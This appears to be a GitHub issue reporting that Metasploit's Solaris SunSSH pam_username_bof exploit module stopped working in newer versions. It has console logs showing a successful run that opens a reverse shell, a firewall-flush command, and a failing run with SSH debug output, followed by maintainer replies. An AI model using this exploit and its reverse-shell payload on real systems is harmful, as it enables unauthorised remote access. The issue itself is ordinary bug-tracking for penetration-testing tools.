exploit/solaris/ssh/pam_username_bof doesn't work in Metasploit recent versions

[frantz45]

Steps to reproduce

Use exploit/solaris/ssh/pam_username_bof with a recent version of Metasploit.

Target version (uname -a):
SunOS solaris 5.10 Generic_147148-26 i86pc i386 i86pc

Were you following a specific guide/tutorial or reading documentation?

No

Expected behavior

msf6 exploit(solaris/ssh/pam_username_bof) > run

[*] Started reverse TCP handler on 192.168.120.45:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/ssh/ssh_version as check
[+] 192.168.120.1:22      - SSH server version: SSH-2.0-Sun_SSH_1.1.5 ( service.version=1.1.5 service.vendor=Sun service.product=SSH os.vendor=Sun os.family=Solaris os.product=Solaris os.cpe23=cpe:/o:sun:solaris:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.120.1:22      - Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable. SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware is a compatible target.
[*] Exploiting SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware
[*] Yeeting cmd/unix/reverse_zsh at 192.168.120.1:22
[*] Command shell session 1 opened (192.168.120.45:4444 -> 192.168.120.1:32867) at 2022-06-08 08:01:03 -0400

pwd
/
^C
Abort session 1? [y/N]  y

[*] 192.168.120.1 - Command shell session 1 closed.  Reason: User exit

Current behavior

msf6 exploit(solaris/ssh/pam_username_bof) > run

[+] ipf -Fi && ipf -Fo && ipf -Fa
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/ssh/ssh_version as check
[+] 192.168.135.10:22     - SSH server version: SSH-2.0-Sun_SSH_1.1.5 ( service.version=1.1.5 service.vendor=Sun service.product=SSH os.vendor=Sun os.family=Solaris os.product=Solaris os.cpe23=cpe:/o:sun:solaris:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.135.10:22     - Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable. SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware is a compatible target.
[*] Exploiting SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware
[*] Yeeting cmd/unix/generic at 192.168.135.10:22
D, [2022-06-08T07:46:07.100094 #3176492] DEBUG -- net.ssh.transport.session[c350]: establishing connection to 192.168.135.10:22 through proxy
D, [2022-06-08T07:46:08.524051 #3176492] DEBUG -- net.ssh.transport.session[c350]: connection established
I, [2022-06-08T07:46:08.524678 #3176492]  INFO -- net.ssh.transport.server_version[c364]: negotiating protocol version
D, [2022-06-08T07:46:08.524787 #3176492] DEBUG -- net.ssh.transport.server_version[c364]: local is `SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3'
D, [2022-06-08T07:46:08.948778 #3176492] DEBUG -- net.ssh.transport.server_version[c364]: remote is `SSH-2.0-Sun_SSH_1.1.5'
I, [2022-06-08T07:46:08.949931 #3176492]  INFO -- net.ssh.transport.algorithms[c378]: sending KEXINIT
D, [2022-06-08T07:46:08.950417 #3176492] DEBUG -- tcpsocket[c38c]: queueing packet nr 0 type 20 len 1380
D, [2022-06-08T07:46:08.950597 #3176492] DEBUG -- tcpsocket[c38c]: sent 1384 bytes
D, [2022-06-08T07:46:10.456663 #3176492] DEBUG -- tcpsocket[c38c]: read 528 bytes
D, [2022-06-08T07:46:10.457102 #3176492] DEBUG -- tcpsocket[c38c]: received packet nr 0 type 20 len 524
I, [2022-06-08T07:46:10.457242 #3176492]  INFO -- net.ssh.transport.algorithms[c378]: got KEXINIT from server
I, [2022-06-08T07:46:10.457449 #3176492]  INFO -- net.ssh.transport.algorithms[c378]: negotiating algorithms
D, [2022-06-08T07:46:10.457682 #3176492] DEBUG -- net.ssh.transport.algorithms[c378]: negotiated:
* kex: diffie-hellman-group14-sha1
* host_key: ssh-rsa
* encryption_server: aes256-ctr
* encryption_client: aes256-ctr
* hmac_client: hmac-sha1
* hmac_server: hmac-sha1
* compression_client: none
* compression_server: none
* language_client: 
* language_server: 
D, [2022-06-08T07:46:10.457754 #3176492] DEBUG -- net.ssh.transport.algorithms[c378]: exchanging keys
D, [2022-06-08T07:46:10.472216 #3176492] DEBUG -- tcpsocket[c38c]: queueing packet nr 1 type 30 len 268
D, [2022-06-08T07:46:10.472378 #3176492] DEBUG -- tcpsocket[c38c]: sent 272 bytes
D, [2022-06-08T07:46:12.545391 #3176492] DEBUG -- tcpsocket[c38c]: read 592 bytes
D, [2022-06-08T07:46:12.545710 #3176492] DEBUG -- tcpsocket[c38c]: received packet nr 1 type 31 len 572
D, [2022-06-08T07:46:12.547763 #3176492] DEBUG -- tcpsocket[c38c]: queueing packet nr 2 type 21 len 20
D, [2022-06-08T07:46:12.547952 #3176492] DEBUG -- tcpsocket[c38c]: sent 24 bytes
D, [2022-06-08T07:46:12.548238 #3176492] DEBUG -- tcpsocket[c38c]: received packet nr 2 type 21 len 12
D, [2022-06-08T07:46:12.549461 #3176492] DEBUG -- net.ssh.authentication.session[c3a0]: beginning authentication of `'
D, [2022-06-08T07:46:12.549722 #3176492] DEBUG -- tcpsocket[c38c]: queueing packet nr 3 type 5 len 28
D, [2022-06-08T07:46:12.549838 #3176492] DEBUG -- tcpsocket[c38c]: sent 52 bytes
D, [2022-06-08T07:46:14.659223 #3176492] DEBUG -- tcpsocket[c38c]: read 68 bytes
[-] Exploit failed: Net::SSH::Exception padding error, need 3127432943 block 16
[*] Exploit completed, but no session was created.

Metasploit version

It works in v6.0.29-dev.
It doesn't work in v6.1.42-dev and in v6.2.

Additional Information

It may be linked with #16328

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[bcoles]

I'm guessing this is probably a legitimate bug due to recent changes to SSH libraries.

Removing stale label, but making no personal commitment to review this issue.